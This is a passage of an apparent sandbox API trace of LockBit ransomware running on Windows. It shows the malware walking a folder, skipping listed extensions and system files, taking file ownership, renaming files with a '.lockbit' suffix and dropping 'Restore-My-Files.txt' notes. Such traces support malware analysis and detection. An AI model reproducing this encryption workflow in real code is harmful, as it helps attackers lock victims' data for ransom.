lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.769] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.769] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.769] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ko-kr.xml") returned 1 [0081.769] lstrcmpiW (lpString1="ntldr", lpString2="ko-kr.xml") returned 1 [0081.769] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ko-kr.xml") returned 1 [0081.769] lstrcmpiW (lpString1="bootsect.bak", lpString2="ko-kr.xml") returned -1 [0081.769] lstrcmpiW (lpString1="autorun.inf", lpString2="ko-kr.xml") returned -1 [0081.770] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.770] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned=".xml" [0081.770] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.770] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.770] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.771] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.771] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.lockbit") returned 88 [0081.771] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.771] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.lockbit")) returned 0 [0081.772] GetLastError () returned 0x5 [0081.772] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.772] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.772] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.773] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.773] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.773] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c0, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.774] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.774] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.906] NtClose (Handle=0x3c0) returned 0x0 [0081.906] RtlFreeAnsiString (AnsiString="\\") [0081.906] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c0) returned 1 [0081.906] malloc (_Size=0x200) returned 0x53fcc0 [0081.906] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.906] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.906] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.906] CloseHandle (hObject=0x3c0) returned 1 [0081.906] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.907] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.908] free (_Block=0x53fcc0) [0081.908] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.908] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.lockbit")) returned 1 [0081.909] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0081.909] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.909] malloc (_Size=0x40068) returned 0x206b860 [0081.909] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=15097) returned 1 [0081.909] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0081.911] GetLastError () returned 0x3e5 [0081.911] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.911] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.911] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.911] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f774659, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x264b, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="zh-changjei.xml", cAlternateFileName="")) returned 1 [0081.911] lstrcmpiW (lpString1=".", lpString2="zh-changjei.xml") returned -1 [0081.911] lstrcmpiW (lpString1="..", lpString2="zh-changjei.xml") returned -1 [0081.911] PathFindExtensionW (pszPath="zh-changjei.xml") returned=".xml" [0081.911] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.911] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.912] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.913] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.913] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="zh-changjei.xml") returned -1 [0081.913] lstrcmpiW (lpString1="ntldr", lpString2="zh-changjei.xml") returned -1 [0081.913] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="zh-changjei.xml") returned -1 [0081.913] lstrcmpiW (lpString1="bootsect.bak", lpString2="zh-changjei.xml") returned -1 [0081.913] lstrcmpiW (lpString1="autorun.inf", lpString2="zh-changjei.xml") returned -1 [0081.913] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\") returned="" [0081.913] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned=".xml" [0081.913] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0081.913] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0081.913] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0081.914] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0081.914] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.lockbit") returned 94 [0081.914] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.914] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.lockbit")) returned 0 [0081.918] GetLastError () returned 0x5 [0081.919] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0081.919] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0081.919] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.919] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0081.919] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0081.920] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3b8, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0081.920] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0081.920] NtQueryInformationFile (in: FileHandle=0x3b8, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0081.929] NtClose (Handle=0x3b8) returned 0x0 [0081.929] RtlFreeAnsiString (AnsiString="\\") [0081.929] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3b8) returned 1 [0081.929] malloc (_Size=0x200) returned 0x53fcc0 [0081.929] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0081.929] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.929] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0081.929] CloseHandle (hObject=0x3b8) returned 1 [0081.930] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0081.930] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0081.931] free (_Block=0x53fcc0) [0081.931] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0081.931] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.lockbit")) returned 1 [0081.931] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0081.931] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0081.931] malloc (_Size=0x40068) returned 0x20abae0 [0081.931] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=9803) returned 1 [0081.932] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0081.934] GetLastError () returned 0x3e5 [0081.934] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 1 [0081.934] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt") returned 91 [0081.934] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.934] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="zh-dayi.xml", cAlternateFileName="")) returned 1 [0081.934] lstrcmpiW (lpString1=".", lpString2="zh-dayi.xml") returned -1 [0081.934] lstrcmpiW (lpString1="..", lpString2="zh-dayi.xml") returned -1 [0081.934] PathFindExtensionW (pszPath="zh-dayi.xml") returned=".xml" [0081.934] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0081.934] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0081.935] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0081.936] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0081.937] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0081.937] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0081.937] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0081.937] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0081.937] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0081.937] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0081.937] wsprintfW (in: param_1=0x344c6e0, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0081.937] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="zh-dayi.xml") returned -1 [0081.937] lstrcmpiW (lpString1="ntldr", lpString2="zh-dayi.xml") returned -1 [0081.937] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="zh-dayi.xml") returned -1 [0081.937] lstrcmpiW (lpString1="bootsect.bak", lpString2="zh-dayi.xml") returned -1 [0081.937] lstrcmpiW (lpString1="autorun.inf", lpString2="zh-dayi.xml") returned -1 [0081.937] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main" | out: pszPath="C:\\\\Program Files\\Common 